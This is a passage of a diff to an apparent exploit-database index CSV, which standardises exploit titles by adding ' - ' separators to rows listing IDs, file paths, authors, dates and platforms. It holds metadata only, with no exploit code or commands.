3.0.2 - Multiple Vulnerabilities",2012-11-30,"Sense of Security",php,webapps,0 -23038,platforms/windows/remote/23038.c,"eMule 0.2x Client OP_SERVERIDENT Heap Overflow",2003-09-01,"Stefan Esser",windows,remote,0 +23038,platforms/windows/remote/23038.c,"eMule 0.2x Client - OP_SERVERIDENT Heap Overflow",2003-09-01,"Stefan Esser",windows,remote,0 23039,platforms/php/webapps/23039.txt,"Fusion News 3.3 - Unauthorized Account Addition",2003-08-18,DarkKnight,php,webapps,0 -23040,platforms/windows/remote/23040.c,"eMule 0.2x AttachToAlreadyKnown Double Free",2003-09-01,"Stefan Esser",windows,remote,0 -23041,platforms/windows/local/23041.txt,"DeskSoft CheckMail 1.2 Password Disclosure",2003-08-19,"cyber talon",windows,local,0 +23040,platforms/windows/remote/23040.c,"eMule 0.2x - AttachToAlreadyKnown Double Free",2003-09-01,"Stefan Esser",windows,remote,0 +23041,platforms/windows/local/23041.txt,"DeskSoft CheckMail 1.2 - Password Disclosure",2003-08-19,"cyber talon",windows,local,0 23042,platforms/windows/dos/23042.pl,"Cerberus FTPServer 1.71/2.1/2.32 - Remote Denial of Service",2003-08-20,"real Remoter",windows,dos,0 23043,platforms/windows/remote/23043.txt,"RealOne Player 1.0/2.0/6.0.10/6.0.11 - .SMIL File Script Execution",2003-08-19,KrazySnake,windows,remote,0 23044,platforms/windows/remote/23044.txt,"Microsoft Internet Explorer 5/6 - Object Type Validation",2003-08-20,"Drew Copley",windows,remote,0 -23045,platforms/linux/dos/23045.pl,"ViRobot Linux Server 2.0",2003-08-20,kf,linux,dos,0 -23046,platforms/openbsd/local/23046.c,"OpenBSD 3.3 Semget() Integer Overflow (1)",2003-08-20,blexim,openbsd,local,0 -23047,platforms/openbsd/local/23047.c,"OpenBSD 3.3 Semget() Integer Overflow (2)",2003-08-20,blexim,openbsd,local,0 +23045,platforms/linux/dos/23045.pl,"ViRobot Linux Server 2.0 - Exploit",2003-08-20,kf,linux,dos,0 +23046,platforms/openbsd/local/23046.c,"OpenBSD 3.3 - Semget() Integer Overflow (1)",2003-08-20,blexim,openbsd,local,0 +23047,platforms/openbsd/local/23047.c,"OpenBSD 3.3 - Semget() Integer Overflow (2)",2003-08-20,blexim,openbsd,local,0 23048,platforms/linux/dos/23048.txt,"Srcpd 2.0 - Remote Integer Overflow",2003-08-21,Over_G,linux,dos,0 23049,platforms/linux/remote/23049.c,"Srcpd 2.0 - Multiple Buffer Overflow Vulnerabilities",2003-08-21,Over_G,linux,remote,0 -23050,platforms/multiple/dos/23050.txt,"Avant Browser 8.0.2 Long HTTP Request Buffer Overflow",2003-08-21,nimber@designer.ru,multiple,dos,0 +23050,platforms/multiple/dos/23050.txt,"Avant Browser 8.0.2 - Long HTTP Request Buffer Overflow",2003-08-21,nimber@designer.ru,multiple,dos,0 23051,platforms/multiple/dos/23051.txt,"WapServ 1.0 - Denial of Service",2003-08-22,"Blue eyeguy4u",multiple,dos,0 23052,platforms/windows/local/23052.rb,"BlazeVideo HDTV Player Pro 6.6 - Filename Handling",2012-12-01,Metasploit,windows,local,0 23053,platforms/windows/dos/23053.pl,"Vpop3d - Remote Denial of Service",2003-08-22,daniels@legend.co.uk,windows,dos,0 @@ -20288,7 +20284,7 @@ id,file,description,date,author,platform,type,port 23056,platforms/windows/dos/23056.c,"OptiSoft Blubster 2.5 - Remote Denial of Service Attack",2003-08-25,"Luca Ercoli",windows,dos,0 23057,platforms/php/webapps/23057.txt,"newsPHP 216 - Remote File Inclusion",2003-08-25,Officerrr,php,webapps,0 23058,platforms/php/webapps/23058.txt,"newsPHP 216 - Authentication Bypass",2003-08-25,Officerrr,php,webapps,0 -23059,platforms/cgi/webapps/23059.txt,"Netbula Anyboard 9.9.5 6 Information Disclosure",2003-08-25,"cyber talon",cgi,webapps,0 +23059,platforms/cgi/webapps/23059.txt,"Netbula Anyboard 9.9.5 6 - Information Disclosure",2003-08-25,"cyber talon",cgi,webapps,0 23060,platforms/php/webapps/23060.txt,"Py-Membres 4.x - Secure.php Unauthorized Access",2003-08-26,frog,php,webapps,0 23061,platforms/php/webapps/23061.txt,"Py-Membres 4.x - Pass_done.php SQL Injection",2003-08-26,frog,php,webapps,0 23062,platforms/bsd/local/23062.c,"BSD-Games 2.x - Monop Player Name Local Buffer Overrun (1)",2003-08-25,^sq,bsd,local,0 @@ -20303,25 +20299,25 @@ id,file,description,date,author,platform,type,port 23071,platforms/multiple/remote/23071.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Cross-Site Scripting",2003-08-30,"Martin Eiszner",multiple,remote,0 23072,platforms/php/webapps/23072.txt,"Ezboard - 'invitefriends.php3' Cross-Site Scripting",2003-09-01,"David F. Madrid",php,webapps,0 23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 - 'MySQLJackpot' Windows Remote Root",2012-12-02,kingcope,windows,remote,0 -23074,platforms/windows/remote/23074.txt,"IBM System Director Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0 +23074,platforms/windows/remote/23074.txt,"IBM System Director - Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0 23075,platforms/linux/dos/23075.pl,"MySQL (Linux) - Stack Based Buffer Overrun PoC (0Day)",2012-12-02,kingcope,linux,dos,0 23076,platforms/linux/dos/23076.pl,"MySQL (Linux) - Heap Based Overrun PoC (0Day)",2012-12-02,kingcope,linux,dos,0 23077,platforms/linux/local/23077.pl,"MySQL (Linux) - Database Privilege Elevation Exploit (0Day)",2012-12-02,kingcope,linux,local,0 23078,platforms/linux/dos/23078.txt,"MySQL - Denial of Service PoC (0Day)",2012-12-02,kingcope,linux,dos,0 23079,platforms/windows/remote/23079.txt,"FreeFTPD - Remote Authentication Bypass Exploit (0Day)",2012-12-02,kingcope,windows,remote,0 23080,platforms/windows/remote/23080.txt,"FreeSSHD 2.1.3 - Remote Authentication Bypass Exploit (0Day)",2012-12-02,kingcope,windows,remote,0 -23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Preauth User Enumeration (0Day)",2012-12-02,kingcope,multiple,remote,0 +23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Pre-Auth User Enumeration (0Day)",2012-12-02,kingcope,multiple,remote,0 23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit (0Day)",2012-12-02,kingcope,linux,remote,0 23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique) (0Day)",2012-12-02,kingcope,windows,remote,0 -23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 Message Field HTML Injection",2003-09-01,Trash-80,php,webapps,0 +23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 - Message Field HTML Injection",2003-09-01,Trash-80,php,webapps,0 23085,platforms/cgi/webapps/23085.html,"Sitebuilder 1.4 - 'sitebuilder.cgi' Directory Traversal File Disclosure",2003-09-01,"Zero X",cgi,webapps,0 23086,platforms/windows/dos/23086.txt,"Yahoo! Messenger 4.0/5.0 - Remote Denial of Service",2003-09-01,diman,windows,dos,0 23087,platforms/hardware/dos/23087.c,"Check Point Firewall-1 4.x - SecuRemote Internal Interface Address Information Leakage",2001-07-17,"Jim Becher",hardware,dos,0 23088,platforms/windows/dos/23088.pl,"ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 - Random UDP Flood Denial of Service (1)",2003-09-02,_6mO_HaCk,windows,dos,0 23089,platforms/windows/dos/23089.c,"ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 - Random UDP Flood Denial of Service (2)",2003-09-02,WARL0RD,windows,dos,0 23090,platforms/windows/dos/23090.asm,"ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 - Random UDP Flood Denial of Service (3)",2003-09-02,"Igor Franchuk",windows,dos,0 -23091,platforms/windows/remote/23091.txt,"FloosieTek FTGatePro 1.22 Mail Server Path Disclosure",2003-09-02,"Ziv Kamir",windows,remote,0 -23092,platforms/windows/remote/23092.txt,"FloosieTek FTGatePro 1.22 Mail Server Cross-Site Scripting",2003-09-02,"Ziv Kamir",windows,remote,0 +23091,platforms/windows/remote/23091.txt,"FloosieTek FTGatePro 1.22 - Mail Server Path Disclosure",2003-09-02,"Ziv Kamir",windows,remote,0 +23092,platforms/windows/remote/23092.txt,"FloosieTek FTGatePro 1.22 - Mail Server Cross-Site Scripting",2003-09-02,"Ziv Kamir",windows,remote,0 23093,platforms/windows/remote/23093.txt,"Microsoft Windows XP - TCP Packet Information Leakage",2003-09-02,"Michal Zalewski",windows,remote,0 23094,platforms/windows/remote/23094.txt,"Microsoft Visual Basic For Applications SDK 5.0/6.0/6.2/6.3 Document Handling Buffer Overrun",2003-09-03,"eEye Digital Security Team",windows,remote,0 23095,platforms/windows/remote/23095.c,"Microsoft Access 97/2000/2002 Snapshot Viewer - ActiveX Control Parameter Buffer Overflow",2003-09-03,"Oliver Lavery",windows,remote,0 @@ -20329,9 +20325,9 @@ id,file,description,date,author,platform,type,port 23097,platforms/php/webapps/23097.txt,"WebCalendar 0.9.x - colors.php color XSS",2003-09-03,noconflic,php,webapps,0 23098,platforms/php/webapps/23098.txt,"WebCalendar 0.9.x - week.php user XSS",2003-09-03,noconflic,php,webapps,0 23099,platforms/php/webapps/23099.txt,"WebCalendar 0.9.x - Multiple Module SQL Injection",2003-09-03,noconflic,php,webapps,0 -23100,platforms/windows/remote/23100.c,"Ipswitch WS_FTP Server 3.4/4.0 FTP Command Buffer Overrun Vulnerabilities",2003-09-04,xfocus,windows,remote,0 +23100,platforms/windows/remote/23100.c,"Ipswitch WS_FTP Server 3.4/4.0 - FTP Command Buffer Overrun Vulnerabilities",2003-09-04,xfocus,windows,remote,0 23101,platforms/windows/dos/23101.c,"Microsoft Windows 98 - Fragmented UDP Flood Denial of Service",2003-09-04,WARL0RD,windows,dos,0 -23102,platforms/windows/dos/23102.pl,"FoxWeb 2.5 PATH_INFO Remote Buffer Overrun",2003-06-27,pokleyzz,windows,dos,0 +23102,platforms/windows/dos/23102.pl,"FoxWeb 2.5 - PATH_INFO Remote Buffer Overrun",2003-06-27,pokleyzz,windows,dos,0 23103,platforms/php/webapps/23103.txt,"Digital Scribe 1.x - Error Function Cross-Site Scripting",2003-09-05,Secunia,php,webapps,0 23105,platforms/php/webapps/23105.txt,"myBB KingChat Plugin - SQL Injection",2012-12-03,Red_Hat,php,webapps,0 23106,platforms/php/webapps/23106.txt,"SchoolCMS - Persistent XSS",2012-12-03,VipVince,php,webapps,0 @@ -20344,24 +20340,24 @@ id,file,description,date,author,platform,type,port 23114,platforms/windows/remote/23114.txt,"Microsoft Internet Explorer 5/6 - Browser Popup Window Object Type Validation",2003-09-07,http-equiv,windows,remote,0 23115,platforms/linux/remote/23115.c,"Mah-Jong 1.4 - Client/Server Remote sscanf() Buffer Overflow",2003-09-07,V9,linux,remote,0 23116,platforms/linux/dos/23116.pl,"Mah-Jong 1.4/1.6 - Server Remote Denial of Service",2003-09-07,jsk,linux,dos,0 -23117,platforms/windows/dos/23117.txt,"FTP Desktop 3.5 Banner Parsing Buffer Overflow",2003-09-08,"Bahaa Naamneh",windows,dos,0 -23118,platforms/windows/dos/23118.txt,"FTP Desktop 3.5 FTP 331 Server Response Buffer Overflow",2003-09-08,"Bahaa Naamneh",windows,dos,0 +23117,platforms/windows/dos/23117.txt,"FTP Desktop 3.5 - Banner Parsing Buffer Overflow",2003-09-08,"Bahaa Naamneh",windows,dos,0 +23118,platforms/windows/dos/23118.txt,"FTP Desktop 3.5 - FTP 331 Server Response Buffer Overflow",2003-09-08,"Bahaa Naamneh",windows,dos,0 23119,platforms/linux/local/23119.c,"Apache::Gallery 0.4/0.5/0.6 - Insecure Local File Storage Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 23120,platforms/asp/webapps/23120.txt,"ICQ 2003 Webfront guestbook Cross-Site Scripting",2003-09-08,"Donnie Werner",asp,webapps,0 23121,platforms/windows/remote/23121.txt,"Kukol E.V. HTTP & FTP Server Suite 6.2 - File Disclosure",2003-09-08,euronymous,windows,remote,0 23122,platforms/windows/remote/23122.txt,"Microsoft Internet Explorer 5 - XML Page Object Type Validation",2003-09-08,http-equiv,windows,remote,0 23123,platforms/windows/remote/23123.pl,"Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun",2003-09-08,D4rkGr3y,windows,remote,0 23124,platforms/windows/dos/23124.txt,"NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin IN_MIDI.DLL Track Data Size Buffer Overflow",2003-09-08,"Luigi Auriemma",windows,dos,0 -23125,platforms/php/webapps/23125.txt,"PHPBB 2.0.6 URL BBCode HTML Injection",2003-09-08,keupon_ps2,php,webapps,0 +23125,platforms/php/webapps/23125.txt,"PHPBB 2.0.6 - URL BBCode HTML Injection",2003-09-08,keupon_ps2,php,webapps,0 23126,platforms/linux/local/23126.c,"RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Local Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 23127,platforms/cgi/webapps/23127.txt,"Escapade 0.2.1 Beta Scripting Engine - PAGE Parameter Cross-Site Scripting",2003-09-09,"Bahaa Naamneh",cgi,webapps,0 23128,platforms/cgi/webapps/23128.txt,"Escapade 0.2.1 Beta Scripting Engine - PAGE Parameter Path Disclosure",2003-09-09,"Bahaa Naamneh",cgi,webapps,0 23129,platforms/php/webapps/23129.txt,"Invision Power Board 1.x - Index.php Showtopic Cross-Site Scripting",2003-09-09,"Boy Bear",php,webapps,0 -23130,platforms/windows/dos/23130.txt,"Gordano Messaging Suite 9.0 WWW.exe Denial of Service",2003-09-10,"Phuong Nguyen",windows,dos,0 +23130,platforms/windows/dos/23130.txt,"Gordano Messaging Suite 9.0 - WWW.exe Denial of Service",2003-09-10,"Phuong Nguyen",windows,dos,0 23131,platforms/windows/remote/23131.txt,"Microsoft Internet Explorer 6.0 - Script Execution Vulnerabilities",2003-09-10,"Liu Die Yu and Jelmer",windows,remote,0 23132,platforms/windows/webapps/23132.py,"Advantech Studio 7.0 - SCADA/HMI Directory Traversal (0Day)",2012-12-04,Nin3,windows,webapps,0 23224,platforms/multiple/remote/23224.rb,"Splunk 5.0 - Custom App Remote Code Execution",2012-12-09,Metasploit,multiple,remote,0 -23135,platforms/windows/remote/23135.txt,"FloosieTek FTGatePro 1.2 WebAdmin Interface Information Disclosure Weakness",2003-09-10,"Phuong Nguyen",windows,remote,0 +23135,platforms/windows/remote/23135.txt,"FloosieTek FTGatePro 1.2 - WebAdmin Interface Information Disclosure Weakness",2003-09-10,"Phuong Nguyen",windows,remote,0 23136,platforms/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal",2003-09-10,dr_insane,multiple,remote,0 23137,platforms/multiple/remote/23137.txt,"CacheFlow CacheOS 4.1.10016 - HTTP HOST Proxy",2003-09-10,"Tim Kennedy",multiple,remote,0 23138,platforms/linux/dos/23138.txt,"MySQL 3.23.x/4.0.x - Password Handler Buffer Overflow",2003-09-10,"Frank DENIS",linux,dos,0 @@ -20371,29 +20367,29 @@ id,file,description,date,author,platform,type,port 23142,platforms/multiple/dos/23142.txt,"WideChapter 3.0 - HTTP Request Buffer Overflow",2003-09-15,"Bahaa Naamneh",multiple,dos,0 23143,platforms/sco/local/23143.sh,"SCO OpenServer 5.0.x - 'mana' PATH_INFO Privilege Escalation",2003-09-15,Texonet,sco,local,0 23144,platforms/windows/remote/23144.txt,"minihttp file-sharing for net 1.5 - Directory Traversal",2003-09-15,Winter-Smith,windows,remote,0 -23145,platforms/windows/dos/23145.c,"Ipswitch Imail Server 5.0 SMTP HELO Argument Buffer Overflow",1998-03-10,Rootshell,windows,dos,0 +23145,platforms/windows/dos/23145.c,"Ipswitch Imail Server 5.0 - SMTP HELO Argument Buffer Overflow",1998-03-10,Rootshell,windows,dos,0 23146,platforms/windows/dos/23146.c,"Alt-N MDaemon Server 2.71 SP1 - SMTP HELO Argument Buffer Overflow",1999-03-10,Rootshell,windows,dos,0 23147,platforms/windows/remote/23147.txt,"Nokia Electronic Documentation 5.0 - Directory Disclosure",2003-09-15,@stake,windows,remote,0 23148,platforms/windows/remote/23148.txt,"Nokia Electronic Documentation 5.0 Connection Redirection",2003-09-15,@stake,windows,remote,0 23149,platforms/windows/remote/23149.txt,"Nokia Electronic Documentation 5.0 - Cross-Site Scripting",2003-09-15,"Ollie Whitehouse",windows,remote,0 23150,platforms/windows/dos/23150.c,"ChatZilla 0.8.23 - Remote Denial of Service Attack",2003-09-15,D4rkGr3y,windows,dos,0 -23151,platforms/linux/remote/23151.c,"Liquid War 5.4.5/5.5.6 HOME Environment Variable Buffer Overflow",2003-09-16,"Angelo Rosiello",linux,remote,0 +23151,platforms/linux/remote/23151.c,"Liquid War 5.4.5/5.5.6 - HOME Environment Variable Buffer Overflow",2003-09-16,"Angelo Rosiello",linux,remote,0 23152,platforms/windows/remote/23152.txt,"Yahoo! Webcam ActiveX Control 2.0.0.107 - Buffer Overrun",2003-09-16,cesaro,windows,remote,0 -23153,platforms/cgi/webapps/23153.txt,"NetWin DBabble 2.5 i Cross-Site Scripting",2003-09-16,dr_insane,cgi,webapps,0 +23153,platforms/cgi/webapps/23153.txt,"NetWin DBabble 2.5 i - Cross-Site Scripting",2003-09-16,dr_insane,cgi,webapps,0 23154,platforms/linux/local/23154.c,"Sendmail 8.12.9 - Prescan() Variant Remote Buffer Overrun",2003-09-17,"Gyan Chawdhary",linux,local,0 23155,platforms/windows/remote/23155.rb,"Ektron 8.02 - XSLT Transform Remote Code Execution",2012-12-05,Metasploit,windows,remote,0 23156,platforms/unix/remote/23156.rb,"Tectia SSH USERAUTH Change Request Password Reset",2012-12-05,Metasploit,unix,remote,0 -23157,platforms/windows/remote/23157.txt,"Plug and Play Web Server 1.0 002c Directory Traversal",2003-09-18,"Bahaa Naamneh",windows,remote,0 +23157,platforms/windows/remote/23157.txt,"Plug and Play Web Server 1.0 002c - Directory Traversal",2003-09-18,"Bahaa Naamneh",windows,remote,0 23158,platforms/php/webapps/23158.txt,"Mambo Site Server 4.0.14 - banners.php bid Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 23159,platforms/php/webapps/23159.txt,"Mambo Site Server 4.0.14 - emailarticle.php id Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 23160,platforms/php/webapps/23160.txt,"Mambo Site Server 4.0.14 - contact.php Unauthorized Mail Relay",2003-09-18,"Lifo Fifo",php,webapps,0 23161,platforms/linux/remote/23161.c,"LSH 1.x - Remote Buffer Overflow (1)",2003-09-19,"Carl Livitt",linux,remote,0 23162,platforms/linux/remote/23162.c,"LSH 1.x - Remote Buffer Overflow (2)",2003-09-19,"m00 security",linux,remote,0 -23163,platforms/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager sql_id Information Disclosure",2003-09-19,"H Zero Seven",php,webapps,0 +23163,platforms/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager - sql_id Information Disclosure",2003-09-19,"H Zero Seven",php,webapps,0 23164,platforms/php/webapps/23164.txt,"myPHPNuke 1.8.8 - auth.inc.php SQL Injection",2003-09-20,"Lifo Fifo",php,webapps,0 23165,platforms/windows/dos/23165.txt,"Sun Java 1.x - XML Document Nested Entity Denial of Service",2003-09-22,"Sun Microsystems",windows,dos,0 -23166,platforms/windows/dos/23166.pl,"Plug And Play Web Server 1.0 002c FTP Service Command Handler Buffer Overflow Vulnerabilities",2003-09-21,"Bahaa Naamneh",windows,dos,0 -23167,platforms/irix/dos/23167.c,"Sendmail 8.9.2 Headers Prescan Denial of Service",1998-12-12,marchew,irix,dos,0 +23166,platforms/windows/dos/23166.pl,"Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow Vulnerabilities",2003-09-21,"Bahaa Naamneh",windows,dos,0 +23167,platforms/irix/dos/23167.c,"Sendmail 8.9.2 - Headers Prescan Denial of Service",1998-12-12,marchew,irix,dos,0 23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Elevation",2003-09-22,"Sebastian Krahmer",linux,local,0 23169,platforms/windows/dos/23169.pl,"wzdftpd 0.1 rc5 - Login Remote Denial of Service",2003-09-23,"Moran Zavdi",windows,dos,0 23170,platforms/linux/dos/23170.c,"ProFTPD 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun",2003-09-23,netris,linux,dos,0 @@ -20405,19 +20401,19 @@ id,file,description,date,author,platform,type,port 23176,platforms/multiple/remote/23176.txt,"NullLogic Null HTTPd 0.5.1 - Error Page Long HTTP Request Cross-Site Scripting",2003-09-24,"Luigi Auriemma",multiple,remote,0 23177,platforms/windows/dos/23177.txt,"NVIDIA Install Application 2.1002.85.551 - (NVI2.dll) Unicode Buffer Overflow PoC",2012-12-06,LiquidWorm,windows,dos,0 23178,platforms/multiple/remote/23178.rb,"Adobe IndesignServer 5.5 - SOAP Server Arbitrary Script Execution",2012-12-06,Metasploit,multiple,remote,0 -23179,platforms/windows/remote/23179.rb,"Oracle MySQL for Microsoft Windows MOF Execution",2012-12-06,Metasploit,windows,remote,0 +23179,platforms/windows/remote/23179.rb,"Oracle MySQL for Microsoft Windows - MOF Execution",2012-12-06,Metasploit,windows,remote,0 23180,platforms/php/webapps/23180.txt,"Kordil EDms 2.2.60rc3 - SQL Injection",2012-12-06,"Woody Hughes",php,webapps,0 23181,platforms/multiple/dos/23181.txt,"NullLogic Null HTTPd 0.5 - Remote Denial of Service",2003-09-24,"Luigi Auriemma",multiple,dos,0 23182,platforms/linux/remote/23182.c,"CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (1)",2003-09-25,jsk,linux,remote,0 23183,platforms/linux/remote/23183.c,"CFEngine 2.0.x - CFServD Transaction Packet Buffer Overrun (2)",2003-11-04,snooq,linux,remote,0 -23184,platforms/windows/webapps/23184.txt,"Software602 602Pro LAN SUITE 2003 Sensitive User Information Storage",2003-09-25,"Phuong Nguyen",windows,webapps,0 +23184,platforms/windows/webapps/23184.txt,"Software602 602Pro LAN SUITE 2003 - Sensitive User Information Storage",2003-09-25,"Phuong Nguyen",windows,webapps,0 23185,platforms/windows/remote/23185.txt,"software602 602pro lan suite 2003 - Directory Traversal",2003-09-25,"Phuong Nguyen",windows,remote,0 -23186,platforms/linux/remote/23186.txt,"MPlayer 0.9/1.0 Streaming ASX Header Parsing Buffer Overrun",2003-09-25,"Otero Hernan",linux,remote,0 +23186,platforms/linux/remote/23186.txt,"MPlayer 0.9/1.0 - Streaming ASX Header Parsing Buffer Overrun",2003-09-25,"Otero Hernan",linux,remote,0 23187,platforms/cgi/remote/23187.txt,"SBox 1.0.4 - Path Disclosure",2003-09-25,"Julio e2fsck Cesar",cgi,remote,0 -23188,platforms/linux/remote/23188.c,"Athttpd 0.4 b Remote GET Request Buffer Overrun",2003-09-25,r-code,linux,remote,0 +23188,platforms/linux/remote/23188.c,"Athttpd 0.4 b - Remote GET Request Buffer Overrun",2003-09-25,r-code,linux,remote,0 23189,platforms/linux/local/23189.c,"marbles 1.0.1 - Local Home Environment Variable Buffer Overflow",2003-09-26,demz,linux,local,0 -23190,platforms/hardware/dos/23190.pl,"SMC Router 1.2x Random UDP Packet Denial of Service",2003-09-26,_6mO_HaCk,hardware,dos,0 -23191,platforms/windows/dos/23191.txt,"Savant Web Server 3.1 Page Redirect Denial of Service",2003-09-26,"Phuong Nguyen",windows,dos,0 +23190,platforms/hardware/dos/23190.pl,"SMC Router 1.2x - Random UDP Packet Denial of Service",2003-09-26,_6mO_HaCk,hardware,dos,0 +23191,platforms/windows/dos/23191.txt,"Savant Web Server 3.1 - Page Redirect Denial of Service",2003-09-26,"Phuong Nguyen",windows,dos,0 23192,platforms/php/webapps/23192.txt,"GuppY 2.4 - HTML Injection",2003-09-29,"David Suzanne",php,webapps,0 23193,platforms/php/webapps/23193.txt,"Geeklog 1.3.x - SQL injection",2003-09-29,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23194,platforms/php/webapps/23194.txt,"Geeklog 1.3.x - XSS",2003-09-29,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 @@ -20425,7 +20421,7 @@ id,file,description,date,author,platform,type,port 23196,platforms/linux/remote/23196.c,"WebFS 1.x - Long Pathname Buffer Overrun",2003-09-29,jsk,linux,remote,0 23197,platforms/linux/local/23197.c,"Mah-Jong 1.4 - MJ-Player Server Flag Local Buffer Overflow",2003-09-29,jsk,linux,local,0 23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 - Invalid Command Error Response Format String",2003-09-29,"Luigi Auriemma",windows,remote,0 -23199,platforms/multiple/remote/23199.c,"OpenSSL ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0 +23199,platforms/multiple/remote/23199.c,"OpenSSL - ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0 23200,platforms/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 - IRC Client Remote Buffer Overflow",2003-09-30,"Luigi Auriemma",linux,dos,0 23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 - (.swf) Crash PoC",2012-12-07,coolkaveh,windows,dos,0 23202,platforms/freebsd/webapps/23202.txt,"m0n0wall 1.33 - Multiple CSRF Vulnerabilities",2012-12-07,"Yann CAM",freebsd,webapps,0 @@ -20438,7 +20434,7 @@ id,file,description,date,author,platform,type,port 23209,platforms/windows/remote/23209.txt,"mutant penguin mpweb pro 1.1.2 - Directory Traversal",2003-10-01,"GamaSec Security",windows,remote,0 23210,platforms/windows/local/23210.c,"Microsoft Windows XP/2000 - PostThreadMessage() Arbitrary Process Killing",2003-10-02,"Brett Moore",windows,local,0 23211,platforms/windows/remote/23211.cpp,"EarthStation 5 - Search Service Remote File Deletion",2003-10-03,"random nut",windows,remote,0 -23212,platforms/hardware/remote/23212.txt,"Cisco LEAP Password Disclosure Weakness",2003-10-03,"Cisco Security",hardware,remote,0 +23212,platforms/hardware/remote/23212.txt,"Cisco LEAP - Password Disclosure Weakness",2003-10-03,"Cisco Security",hardware,remote,0 23213,platforms/php/webapps/23213.txt,"WordPress 0.6/0.7 - Blog.Header.php SQL Injection",2003-10-03,"Seth Woolley",php,webapps,0 23214,platforms/cgi/webapps/23214.txt,"Sun Cobalt RaQ 1.1/2.0/3.0/4.0 - Message.CGI Cross-Site Scripting",2003-10-03,"Lorenzo Hernandez Garcia-Hierro",cgi,webapps,0 23215,platforms/windows/dos/23215.html,"Microsoft Internet Explorer 6 - Absolute Position Block Denial of Service",2003-10-03,"Nick Johnson",windows,dos,0 @@ -20447,12 +20443,12 @@ id,file,description,date,author,platform,type,port 23218,platforms/php/webapps/23218.txt,"EternalMart Mailing List Manager 1.32 - Remote File Inclusion",2003-10-04,frog,php,webapps,0 23219,platforms/php/webapps/23219.txt,"GuppY 2.4 - Cross-Site Scripting",2003-10-05,frog,php,webapps,0 23220,platforms/php/webapps/23220.txt,"GuppY 2.4 - Remote File Access",2003-10-05,frog,php,webapps,0 -23221,platforms/multiple/remote/23221.txt,"JBoss 3.0.8/3.2.1 HSQLDB Remote Command Injection",2003-10-06,"Marc Schoenefeld",multiple,remote,0 -23222,platforms/windows/remote/23222.txt,"File Sharing Software Easy File Sharing Web Server 1.2 Information Disclosure",2003-10-06,nimber@designer.ru,windows,remote,0 -23223,platforms/linux/local/23223.c,"SuSE Linux Professional 8.2 SuSEWM Configuration File Insecure Temporary File",2003-10-06,"Nash Leon",linux,local,0 +23221,platforms/multiple/remote/23221.txt,"JBoss 3.0.8/3.2.1 - HSQLDB Remote Command Injection",2003-10-06,"Marc Schoenefeld",multiple,remote,0 +23222,platforms/windows/remote/23222.txt,"File Sharing Software Easy File Sharing Web Server 1.2 - Information Disclosure",2003-10-06,nimber@designer.ru,windows,remote,0 +23223,platforms/linux/local/23223.c,"SuSE Linux Professional 8.2 - SuSEWM Configuration File Insecure Temporary File",2003-10-06,"Nash Leon",linux,local,0 23225,platforms/windows/remote/23225.rb,"Maxthon3 - about:history XCS Trusted Zone Code Execution",2012-12-09,Metasploit,windows,remote,0 23226,platforms/windows/remote/23226.rb,"FreeFloat FTP Server - Arbitrary File Upload",2012-12-09,Metasploit,windows,remote,21 -23227,platforms/unix/remote/23227.rb,"Nagios XI Network Monitor Graph Explorer Component Command Injection",2012-12-09,Metasploit,unix,remote,0 +23227,platforms/unix/remote/23227.rb,"Nagios XI Network Monitor Graph Explorer Component - Command Injection",2012-12-09,Metasploit,unix,remote,0 23228,platforms/linux/local/23228.c,"SLocate 2.6 - User-Supplied Database Heap Overflow",2003-10-06,"Patrik Hornik",linux,local,0 23229,platforms/windows/remote/23229.cpp,"Microsoft Windows XP/2000/2003 - Message Queuing Service Heap Overflow",2003-10-07,DaveK,windows,remote,0 23230,platforms/multiple/remote/23230.txt,"Adobe SVG Viewer 3.0 - postURL/getURL Restriction Bypass",2003-10-07,"GreyMagic Software",multiple,remote,0 @@ -20465,10 +20461,10 @@ id,file,description,date,author,platform,type,port 23237,platforms/php/webapps/23237.pl,"PHP-Nuke 6.6 - admin.php SQL Injection",2003-10-08,1dt.w0lf,php,webapps,0 23238,platforms/php/webapps/23238.txt,"Gallery 1.4 - index.php Remote File Inclusion",2003-10-11,peter,php,webapps,0 23239,platforms/linux/dos/23239.c,"IRCnet IRCD 2.10 - Local Buffer Overflow",2003-10-13,millhouse,linux,dos,0 -23240,platforms/windows/dos/23240.pl,"mIRC 6.1 DCC SEND Buffer Overflow (1)",2003-10-13,"Takara Takaishi",windows,dos,0 -23241,platforms/windows/dos/23241.pl,"mIRC 6.1 DCC SEND Buffer Overflow (2)",2003-10-13,DarkAngel,windows,dos,0 